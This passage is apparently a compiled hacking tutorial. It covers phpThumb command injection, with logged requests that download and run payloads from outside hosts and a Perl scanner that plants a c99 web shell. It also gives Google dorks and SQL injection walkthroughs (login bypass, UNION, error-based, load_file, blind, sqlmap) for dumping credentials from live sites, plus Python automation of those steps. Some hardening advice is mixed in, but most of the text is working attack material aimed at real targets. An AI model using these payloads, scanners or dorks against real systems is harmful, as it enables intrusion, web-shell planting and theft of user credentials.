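    """Preferred form: an argument vector executed without a shell."""
    return ["convert", src, "-blur", str(parse_radius(radius)), dst]


def hardened_shell_string(src, dst, radius):
    """If a shell string is unavoidable: validate, then quote every argument
    (shlex.quote is the equivalent of escapeshellarg())."""
    return " ".join(shlex.quote(arg) for arg in hardened_argv(src, dst, radius))


def shell_command_count(cmdline):
    """How many separate commands a POSIX shell would run for cmdline."""
    tokens = list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))
    return 1 + sum(1 for t in tokens if t in (";", "&&", "||", "|"))


if __name__ == "__main__":
    print(vulnerable_command("file.jpg", "out.jpg", PAYLOAD))
    print(hardened_shell_string("file.jpg", "out.jpg", PAYLOAD))
```

Validation and quoting do different jobs: the integer cast removes everything after the 9, and the quoting guarantees that even a value which survived validation cannot end the command. The argument-vector form (subprocess without shell=True in Python, proc_open with an array in PHP 7.4+) makes the second job unnecessary.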
The problem with these extensions is that they use dangerous PHP functions which have the potential to mess up a web hosting server and hack / exploit user accounts further up to root level.
Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing dangerous commands and take control over the complete server quickly.
Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP configuration by certain responsible webhosts.
(Un)fortunately escapeshellarg is often part of the disabled functions, so either way you can't win except by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with the following line:
Code:
disable_functions = exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions
Code:
safe_mode = On
expose_php = Off
enable_dl = Off
magic_quotes_gpc = On
register_globals = Off
display_errors = Off
disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg, escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1
Two caveats on these lists. Disabling escapeshellarg() is counterproductive: it is exactly the function that makes the fixed phpThumb code safe, and a script that cannot call it either breaks or falls back to unquoted arguments; disable the execution functions (exec, system, passthru, shell_exec, popen, proc_open) instead. And safe_mode and magic_quotes were removed in PHP 5.4, so those two lines only apply to older installations.
Exploit Scans
The queries are as follows:
Code:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in the phpThumb.php fltr[] parameter:
Code:
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;
Display all information about files / directories - shows long listing information about the file / directory:
Code:
ls -l /tmp;
Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6:
Code:
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;
Usually default permissions are set to 0644; change the file permission to 0755 for owner / group / others so that the file can be executed:
Code:
chmod 0755 /tmp/barbut6;
Run / execute file barbut6:
Code:
/tmp/barbut6;
The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists all processes on a terminal, including those of other users, "x" lists all processes without controlling terminals and "u" adds a column for the controlling user for each process. Note that, for maximum compatibility when using this syntax, there is no "-" in front of the "aux".
Code:
ps -aux;
Send SIGKILL to all perl processes. SIGKILL (signal number 9) is a forced shutdown of a process. Note that with SIGKILL the process will not have the opportunity to clean up any system resources it was using (e.g. temporary files etc.):
Code:
killall -9 perl;
Start perl and run / execute file f:
Code:
perl /tmp/f;
The output will be kept in the picture debug output, created through the parameter phpThumbDebug=9:
Code:
&phpThumbDebug=9
IP List
List of IPs involved in the scans:
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 | 200.155.17.68
Targets
Code:
GET /cms/plugins/content/jthumbs/includes/phpThumb.php
GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
GET /common/scripts/phpThumb/phpThumb.php
GET /phpThumb/phpThumb.php
GET /libs/phpThumb/phpThumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
GET /gallery/phpThumb/phpThumb.php
The check-and-upload part of the scanner, with the backslash escapes the page lost restored. The part that sets up $agent and $target and sends the first request (the fltr[] payload that fetches c991.txt onto the target) is not included on the page, so those variables are only declared here:
Code:
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

# $agent, $target and $request (the response to the fltr[] payload) come
# from the part of the script that is not reproduced on this page.
our ($agent, $target, $request);

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: /))
{
    print "[+] Exploit sent with success.\n";
    sleep(1.4);
}
else
{
    print "[-] Exploit sent but probably the website is not vulnerable.\n";
    sleep(1.3);
}
print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
my $cwebsite = "$target/c991.txt";
my $creq = $agent->request(HTTP::Request->new(GET => $cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/))
{
    print "[+] Txt Shell uploaded :)\n";
    sleep(1);
    print "[*] Moving it to PHP format ... wait please ...\n";
    sleep(1.1);
    # The same injection again, this time to rename the uploaded text file to .php
    my $mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
    my $mvreq = $agent->request(HTTP::Request->new(GET => $mvwebsite));
    $cwebsite = "$target/shell.php";
    my $c2req = $agent->request(HTTP::Request->new(GET => $cwebsite));
    if ($c2req->is_success && ($c2req->content =~ m{<b>Command execute</b>} || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/))
    {
        print "[+] PHP Shell injected => '$cwebsite' :)\n";
        sleep(0.8);
        print "[*] Do you want to open it? (y/n) => ";
        my $open = <STDIN>;
        chomp($open);
        if ($open eq "y")
        {
            system("firefox", $cwebsite);
        }
    }
    else
    {
        print "[-] Error while moving shell from Txt to Php :(\n";
        exit(1);
    }
}
else
{
    print "[-] Txt shell not uploaded. :(\n";
}
Login bypass (SQL Injection in a login form):
1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
2) Logging in
Now find a site with these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1-- you can use one of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
Why it works: the login script builds a query like SELECT * FROM users WHERE username='Admin' AND password='<input>'. The quote in our input closes the password string, or 1=1 makes the WHERE clause true for every row, and -- (or #) comments out the rest of the original query. The database returns a row and the script treats that as a successful login. Which variant works depends on how the query is written (single or double quotes, whether the input is quoted at all) and on the database's comment marker: -- for MSSQL, -- followed by a space or # for MySQL.
So if you are able to log in, the site is vulnerable and you will be able to use the admin panel.
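As an added example that is not part of the tutorial, here is the bypass run against a throw-away SQLite database, next to the parameterised query that stops it. The table, the account and the password are made up; SQLite accepts the same -- comment as MSSQL, so the payloads from the list above work unchanged.

```python
import sqlite3

# Added example, not part of the tutorial. An in-memory SQLite database
# stands in for the site's backend; the user table and credentials are
# constructed for the demo.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 's3cret-not-guessable')")
    conn.commit()
    return conn


def injected_query(username, password):
    """The statement the vulnerable login actually sends to the database."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Classic concatenated query: the attacker's quote closes the string and
    the rest of the input becomes SQL (AND binds tighter than OR, so the
    injected OR 1=1 applies to the whole WHERE clause)."""
    return conn.execute(injected_query(username, password)).fetchone() is not None


def safe_login(conn, username, password):
    """Bound parameters: the values travel separately from the SQL text, so a
    quote or a comment marker is just data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(injected_query("Admin", "password' or 1=1--"))
    print("vulnerable:", vulnerable_login(db, "Admin", "password' or 1=1--"))
    print("safe:", safe_login(db, "Admin", "password' or 1=1--"))
```

The printed statement ends in password='password' or 1=1--', and everything after the two dashes, including the dangling quote, is a comment; that is the whole trick. With the bound version the database looks for a user whose password literally is the payload string and finds none.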
SQL Injection:
1) SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in a script, a parameter that is concatenated into a database query, to take data out of the database.
Vulnerable sites are in the format:
Code:
http://www.link.com/index.php?id=
You can have anything else instead of index.
2) Finding vulnerable sites:
The best way to find vulnerable sites is Google. We use these dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check whether a site is vulnerable.
1st way, we have the link:
Code:
http://site.com/book.php?id=141
and we add only ' at the end of the link so we get:
Code:
http://site.com/book.php?id=141'
2nd way, we have the link:
Code:
http://site.com/book.php?id=141
and we add +and+1=2-- at the end of the link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--
If some part of the page disappears (a picture, text or something) or an error appears such as "You have an error in your SQL syntax", the site is vulnerable. The first check relies on an error being shown; the second works even when errors are hidden, because and 1=2 makes the WHERE clause false and the page loses whatever it normally loads for id 141.
4) Finding the number of columns
We do this with ORDER BY, adding +order+by+5-- to the link:
Code:
http://site.com/book.php?id=141+order+by+5--
If the page opens normally there are at least 5 columns. Let's try 10.
Code:
http://site.com/book.php?id=141+order+by+10--
Now some part of the site disappeared, which means there are at least 5 and fewer than 10 columns. Let's try 7.
Code:
http://site.com/book.php?id=141+order+by+7--
The page opens normally, which means there are at least 7 and fewer than 10 columns. Let's try 8.
Code:
http://site.com/book.php?id=141+order+by+8--
With column 8 part of the site disappears, which means there are exactly 7 columns: ORDER BY n fails as soon as n exceeds the number of columns in the SELECT.
5) Finding vulnerable columns
Finding the columns whose content is shown on the page is done with UNION SELECT. We make the original id negative (or otherwise invalid) so that only our UNION row is displayed, and add +union+select+all+1,2,3,4,5,6,7-- with as many numbers as there are columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--
The page prints some of those numbers (in this case 1 2 3 4 5 6 7), and every number that appears marks a column whose data can be read. We are going to use the second column.
6) Finding the database version
As said, we take data through the second column. Instead of the number 2 we put version() or @@version:
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--
Where the number 2 was, the page now shows the database version.
If the version is 4 we have to guess table and column names, because MySQL 4 has no information_schema. If it is 5 or later we can read them from information_schema.
We have version 5.0.51a-24+lenny5, which means we do not have to guess the names of the table and columns.
7) Finding table names
If the database version is 4 you will not be able to list tables and columns; you have to guess their names. If the version is 5 skip this step.
Names of some possible tables:
Code:
admin
admins
user
users
member
members
Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd
If the database version is 5 we can take the table names like this: instead of the number 2 we put group_concat(table_name), and after the last column number we add +from+information_schema.tables+where+table_schema=database()--
So we get this link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--
Where the number 2 was, the page now shows the table names, in this case date, book, users. We are going to take the columns from the users table.
8) Finding column names
We found the table we want and now we want its columns. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex--, where hex is the table name encoded as a hexadecimal literal. Writing the name as 0x... instead of 'users' avoids quotes, which are often filtered or mangled by magic_quotes.
Go to:
Code:
http://www.string-functions.com/string-hex.aspx
write the name of the table (in this case users) and we get the hex string 7573657273, so now we can see the columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is the colon character and separates user from password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--, and we have the link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--
and a result e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga
which are the users and passwords from this site. group_concat() output is capped by group_concat_max_len (1024 bytes by default), so on big tables use limit to page through the rows instead.
10) Filter bypassing
When writing union+select+all gives "not accessible" or a similar block message, change the case: UnIoN+sElEcT+aLl
On some sites spaces are filtered, so use + or /**/ instead (/* and */ open and close a SQL comment, which MySQL treats as whitespace).
On some sites the word version is filtered, so use unhex(hex(version())) or @@version.
11) Site protection from SQL Injection
Checking that the id is numeric stops all of the above, because none of the payloads are numbers:
Code:
if(!is_numeric($_GET['id']))
{
echo 'Invalid id';
exit;
}
$id = (int) $_GET['id'];
The general fix, which also covers string parameters, is to use prepared statements (mysqli or PDO with bound parameters) instead of building the query with string concatenation.
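As an added example that is not part of the tutorial, here is the whole procedure of steps 3 to 9 run against a local SQLite database, so it can be tried without a target. SQLite stands in for MySQL: sqlite_master and pragma_table_info() play the part of information_schema, and concat(a,0x3a,b) becomes a || ':' || b. The ORDER BY probing is done as a binary search rather than by trying 5, 10, 7, 8 by hand, and mysql_hex() produces the quote-free 0x... literal used in the real MySQL payloads. The tables, rows and credentials are made up.

```python
import sqlite3

# Added example, not part of the tutorial. SQLite stands in for MySQL so the
# column count, UNION marker, table/column listing and dump run offline.
# Tables, rows and credentials are constructed for the demo.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE book (id INTEGER, title TEXT, author TEXT);
        INSERT INTO book VALUES (141, 'Some book', 'Some author');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'sebrezovski', '1533562');
        INSERT INTO users VALUES (2, 'biga', 'biga');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """book.php?id=<id_param>: rows the page would render, None on a SQL error."""
    sql = "SELECT id, title, author FROM book WHERE id=" + id_param   # no escaping
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def count_columns(page, base_id, upper=32):
    """ORDER BY probing as a binary search: the largest n that still works."""
    lo, hi = 1, upper
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if page("%s ORDER BY %d--" % (base_id, mid)) is not None:
            lo = mid            # at least mid columns
        else:
            hi = mid - 1        # "ORDER BY term out of range"
    return lo


def union_payload(base_id, ncols, marker_col, expr, tail=""):
    """id=-<base> UNION SELECT 1,<expr>,3,... so only our row is rendered."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[marker_col - 1] = expr
    return "-%s UNION SELECT %s%s--" % (base_id, ",".join(cols), tail)


def read_marker(page, base_id, ncols, marker_col, expr, tail):
    rows = page(union_payload(base_id, ncols, marker_col, expr, tail))
    return rows[0][marker_col - 1]


def list_tables(page, base_id, ncols, marker_col):
    # MySQL: group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
    return read_marker(page, base_id, ncols, marker_col, "group_concat(name)",
                       " FROM sqlite_master WHERE type='table'").split(",")


def list_columns(page, base_id, ncols, marker_col, table):
    # MySQL: group_concat(column_name) FROM information_schema.columns WHERE table_name=0x...
    return read_marker(page, base_id, ncols, marker_col, "group_concat(name)",
                       " FROM pragma_table_info('%s')" % table).split(",")


def dump_credentials(page, base_id, ncols, marker_col, table):
    # MySQL: group_concat(username,0x3a,password) FROM users
    return read_marker(page, base_id, ncols, marker_col,
                       "group_concat(username || ':' || password)",
                       " FROM " + table).split(",")


def mysql_hex(s):
    """Quote-free literal for the real MySQL payloads: 'users' -> 0x7573657273."""
    return "0x" + s.encode().hex()


def run_demo():
    conn = make_db()
    page = lambda param: vulnerable_page(conn, param)
    ncols = count_columns(page, "141")
    return {
        "columns": ncols,
        "tables": list_tables(page, "141", ncols, 2),
        "user_columns": list_columns(page, "141", ncols, 2, "users"),
        "creds": dump_credentials(page, "141", ncols, 2, "users"),
    }


if __name__ == "__main__":
    print(run_demo())
```

The marker column is fixed at 2 here because the demo page renders every column; against a real page you pick one of the numbers that actually shows up in step 5.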
SQL Injection - Load File:
You found a site with a SQL vulnerability; now you can try to access the table mysql.user and check for file privileges.
To see which user we are, and whether we can read mysql.user at all, we put user in place of a vulnerable column and add +from+mysql.user-- at the end of the URL.
It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--
If you get usernames back, you have access to the mysql.user table and you can continue with this tutorial. (Without that access, user() still tells you the current account, but not its privileges.)
Now to see whether we have file privileges, instead of user we put concat(user,0x3a,file_priv), again with +from+mysql.user--
The page now lists usernames and their file privilege. Find the username that was shown at the start, when you put user in the column; if a Y (Yes) is shown next to it, you have the FILE privilege.
Load File:
All we have to do is put load_file('FILE NAME') in the vulnerable column.
We try /etc/passwd, so the vulnerable column becomes load_file('/etc/passwd'), which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--
load_file() returns NULL (nothing is shown) rather than an error when the account lacks FILE, when the file is not readable by the mysqld process, or when secure_file_priv restricts the directories the server may read from.
If the quotes give us an error (magic_quotes or a filter), we can write the file name in char() or hex form instead; in that case the quotes around the file name are removed.
Hex e.g.
If we convert the file name to hex, we prefix it with 0x:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4--
The hex string 2f6574632f706173737764 stands for /etc/passwd.
Recommended for hex:
Code:
www.string-functions.com/string-hex.aspx
If you decide to use char(), write load_file(char(codes)), which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4--
where 47,101,116,99,47,112,97,115,115,119,100 stands for /etc/passwd.
Char converter:
Code:
http://pookey.co.uk/binary.php
MSSQL Injection:
1) Finding the number of columns
I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234
To find the number of columns we use ORDER BY. We add +order+by+5-- at the end of the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--
and get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.
/sr/page/member.asp, line 38
which means there are fewer than 5 columns; let's try 4. We get the same error, so we try 3 and get a different error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.
/sr/page/member.asp, line 44
The "out of range" error is gone, so ORDER BY 3 was accepted by the first query and there are 3 columns. The syntax error comes from a different statement (line 44 instead of 38), most likely a second query on the page into which the same parameter is pasted.
2) Finding the database version
To find the database version we use @@version. MSSQL is strict about types, so we put @@version into a column the query expects to be an integer: the conversion fails and the error message leaks the value.
Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can see the database version.
3) Finding table names
With this error-based technique in MSSQL we cannot get all tables at once (there is no group_concat()); we must go 1 by 1.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Country' to a column of data type int.
/sr/page/member.asp, line 38
and we can see that we have a table called 'Country'.
Now we need the other tables. We exclude the ones we already know with NOT IN, so the error reports the next one:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Admin' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can see that we have an Admin table. Repeat, adding each new name to the NOT IN list, until the page loads without a conversion error.
4) Finding column names
It is the same for columns: we cannot get them all at once, so we do it 1 by 1. In this case we filter with where+table_name='Admin'--. So we have the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--
and we have the error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'USERNAME' to a column of data type int.
/sr/page/member.asp, line 38
From here we can see that we have the column USERNAME. Now we need the rest of the columns, so we use NOT IN again:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'PASSWD' to a column of data type int.
/sr/page/member.asp, line 38
So the next column is PASSWD.
5) Taking data from columns
Now we put the column name in place of table_name and the table name after from:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--
We get the username OjuZwqAul.
It is the same for the password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--
We get the password M7sWt2!2uq.
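As an added example, not part of the tutorial, the one-value-per-request NOT IN enumeration above automated: parse the leaked value out of the conversion error, add it to the exclusion list, repeat until the page renders cleanly. fake_server stands in for the ASP page and answers with the same error text the page shows, using a made-up table list, so the block runs offline; against a real target, fetch would be an HTTP GET that returns the response body.

```python
import re

# Added example, not part of the tutorial: the NOT IN enumeration loop, with
# a simulated target. FAKE_TABLES / FAKE_COLUMNS and BASE are constructed.

CONVERSION_ERROR = re.compile(
    r"converting the nvarchar value '(?P<value>[^']*)' to a column of data type int", re.I)


def parse_leaked_value(body):
    """The string MSSQL failed to cast to int, or None if the page was clean."""
    m = CONVERSION_ERROR.search(body)
    return m.group("value") if m else None


def build_url(base_url, column, source, conditions):
    where = "+where+" + "+and+".join(conditions) if conditions else ""
    return "%s+union+select+all+1,%s,3+from+%s%s--" % (base_url, column, source, where)


def enumerate_values(fetch, base_url, column, source, conditions=(), limit=100):
    """Collect every value of `column` from `source`, one per request."""
    seen = []
    while len(seen) < limit:
        conds = list(conditions)
        if seen:
            quoted = ",".join("'%s'" % v.replace("'", "''") for v in seen)
            conds.append("%s+not+in(%s)" % (column, quoted))
        value = parse_leaked_value(fetch(build_url(base_url, column, source, conds)))
        if value is None or value in seen:
            break              # clean page: nothing left to exclude
        seen.append(value)
    return seen


# ---- simulated target (constructed data) ----
FAKE_TABLES = ["Country", "Admin", "Users"]
FAKE_COLUMNS = {"Admin": ["USERNAME", "PASSWD"]}
BASE = "http://www.site.com/sr/page/member.asp?id=234"


def fake_server(url):
    """Answer like the ASP page: first non-excluded row leaks in the error."""
    if "information_schema.tables" in url:
        candidates = FAKE_TABLES
    else:
        m = re.search(r"table_name='([^']+)'", url)
        candidates = FAKE_COLUMNS.get(m.group(1), []) if m else []
    excluded = set()
    m = re.search(r"not\+in\(([^)]*)\)", url)
    if m:
        excluded = {v.strip("'") for v in m.group(1).split(",")}
    remaining = [c for c in candidates if c not in excluded]
    if remaining:
        return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
                "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the "
                "nvarchar value '%s' to a column of data type int.\n" % remaining[0])
    return "<html>member page rendered normally</html>"


if __name__ == "__main__":
    tables = enumerate_values(fake_server, BASE, "table_name", "information_schema.tables")
    print(tables)
    print(enumerate_values(fake_server, BASE, "column_name", "information_schema.columns",
                           ("table_name='Admin'",)))
```

The loop stops on the first clean page, which is also the signal to watch for by hand: once NOT IN holds every name, the UNION returns no row and the conversion error disappears.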
40. Blind SQL Injection :
1) Blind SQL Injection?
Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not
writing any errors, any table and column names or column content. So that is why it is called
Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind
Injection we don't use --i/* */.
2) Site vulnerability check
We have link:
Code:
http://www.site.com/index.php?id=1
We will add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2
If any part of page disappear, it means that site is vulnerable.
3) Finding database version
As we said already in this method nothing is gonna be showed, so we gonna say that database
version is 4. If part of site disappear it means that version is not 4, but if everything on page stay
as it should it means that version is 4. We gonna use function @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4
If page is loaded as it should then version is 4, if not, then we will try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MYSQL user
First we will check are we able to use select because it is blocked sometimes.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1
If page is loaded normally we can use select, but if not then we can't use it. Now we will check
do we have MYSQL user access.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1
Same as everything else, if page is loaded normally we have access to mysql.user, if not then we
don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.
5) Finding table name
To find table names all we can do is guess. First we find the table name, then the column names in that table.
We take the link and try different table names. If the page loads normally, a table with that name exists. (ime_tabele is the placeholder for the table name you are guessing.)
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1
Our main objective is to find the data in the admin table, so common names to try are:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin
6) Finding column name
Now that we have the table name we wanted, it is time to find the column names. We do the same as for the table: if the page loads normally, the column exists. We need login data, so commonly the columns will be:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass
The link we use for columns is (ime_kolone is the placeholder for the column name, ime_tabele for the table name):
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)+from+ime_tabele+limit+0,1)=1
7) Taking data from columns
In the whole Blind SQL method this is the most boring and longest part. Here we need an ASCII table:
Code:
http://www.asciitable.com/
We only look at the DEC and CHR columns of the ASCII table. First we get the username, letter by letter, so we guess the DEC value of each letter, e.g. for A it is 65.
We have the link (column_name is the column we are reading, table_name its table, and DEC the decimal code we compare against):
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+limit+0,1),1,1))>DEC
If the page loads normally, the first letter of the username has a code greater than DEC; keep adjusting DEC until you have the real letter. To find the second letter change the substring position ,1,1 to ,2,1 (the limit+0,1 part selects the row; limit+1,1 would move on to the next user's row instead).
So now we guess the second letter... It is the same for the password... So after a long, long time we get the username and password. If there are more users and you want their passwords too, you have to add a where clause.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+column_name=something+limit+0,1),1,1))>DEC
For the where clause we usually use the id column, but other columns work as well, e.g. for id:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+id=1+limit+0,1),1,1))>DEC
8) Taking data from columns using sqlmap
As you have noticed, it takes a lot of time to get data from columns by hand, so I suggest you use sqlmap.
Download:
Code:
http://sqlmap.org/
Python download:
Code:
http://www.python.org/download/
Now we have to find the directory where sqlmap is located.
Start>run>cmd and change to the sqlmap directory using cd.
The command to start sqlmap for getting data with Blind SQL Injection on Windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"
NOTE: on Unix put python before sqlmap.py.
So it should look like:
Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"
If there are more users, as I said, use the id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"
After -u you put the link.
After -p you put the parameter which is vulnerable (in our case id).
-a picks a random user agent from txt/user-agents.txt.
-v1 is the verbosity level.
